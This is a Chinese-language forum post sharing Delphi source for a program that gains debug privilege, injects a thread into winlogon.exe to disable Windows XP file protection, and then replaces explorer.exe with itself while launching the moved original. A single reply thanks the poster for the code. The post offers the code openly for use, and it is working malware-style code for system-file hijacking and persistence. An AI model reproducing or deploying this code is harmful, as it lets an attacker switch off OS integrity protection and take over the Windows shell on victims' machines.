关闭XP保护替换explorer.exe
program Project1;
uses
Windows, TlHelp32;
function LowerCase(const S: string): string; //转小写
var
Ch: Char;
L: Integer;
Source, Dest: PChar;
begin
L := Length(S);
SetLength(Result, L);
Source := Pointer(S);
Dest := Pointer(Result);
while L <> 0 do
begin
Ch := Source^;
if (Ch >= ' A' ) and (Ch <= ' Z' ) then Inc(Ch, 32);
Dest^ := Ch;
Inc(Source);
Inc(Dest);
Dec(L);
end;
end;
function CreatedMutexEx(MutexName: Pchar): Boolean;
var
MutexHandle: dword;
begin
MutexHandle := CreateMutex(nil, True, MutexName);
if MutexHandle <> 0 then
begin
if GetLastError = ERROR_ALREADY_EXISTS then
begin
//CloseHandle(MutexHandle);
Result := False;
Exit;
end;
end;
Result := True;
end;
function GetWinPath: string; //取WINDOWS目录
var
Buf: array of char;
begin
GetWindowsDirectory(Buf, MAX_PATH);
Result := Buf;
if Result <> ' \' then Result := Result + ' \' ;
end;
function GetTempDirectory: string; //取临时目录
var
Buf: array of char;
begin
GetTempPath(MAX_PATH, Buf);
Result := Buf;
if Result <> ' \' then Result := Result + ' \' ;
end;
function EnableDebugPriv: Boolean; //提权为DEBUG
var
hToken: THANDLE;
tp: TTokenPrivileges;
rl: Cardinal;
begin
result := false;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
if LookupPrivilegeValue(nil, ' SeDebugPrivilege' , tp.Privileges.Luid) then
begin
tp.PrivilegeCount := 1;
tp.Privileges.Attributes := SE_PRIVILEGE_ENABLED;
result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
end;
end;
procedure InjectThread(ProcessHandle: DWORD); //注入winlogon.exe 关闭XP文件保护
var
TID: LongWord;
hSfc, hThread: HMODULE;
pfnCloseEvents: Pointer;
begin
hSfc := LoadLibrary(' sfc_os.dll' );
pfnCloseEvents := GetProcAddress(hSfc, MAKEINTRESOURCE(2));
FreeLibrary(hSfc);
hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
WaitForSingleObject(hThread, 4000);
end;
procedure InitProcess(Name: string); //查找winlogon.exe进程PID
var
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
ProcessHandle: dword;
begin
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
if Process32First(FSnapshotHandle, FProcessEntry32) then begin
repeat
if Name = LowerCase(FProcessEntry32.szExeFile) then
begin
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
InjectThread(ProcessHandle);
CloseHandle(ProcessHandle);
Break;
end;
until not Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
const ExpFile = ' explorer.exe' ;
MasterMutex = ' OpenSoul' ;
var
s: string;
begin
if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //互拆体
if not EnableDebugPriv then Exit; //提权失败退出
InitProcess(' winlogon.exe' ); //注入winlogon.exe 先关闭xp的文件保护 .预防系统的还原
s := ParamStr(0); //取本名
if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then //判断自己是不是系统下的explorer.exe
begin //如果不是
MoveFileEx(PChar(GetWinPath + ExpFile), PChar(GetWinPath + ' system32\explorer.exe' ), MOVEFILE_REPLACE_EXISTING); //先移动正在运行的explorer.exe
CopyFile(PChar(S), PChar(GetWinPath + ExpFile), false); //把自己复制到windows目录 为explorer.exe
end;
WinExec(PChar(GetWinPath + ' system32\explorer.exe' ), 1); //运行真正的explorer.exe
end.
看看~ 利用线程注入执行sfc_os.dll的函数 代码很好谢谢分享
页:
[1]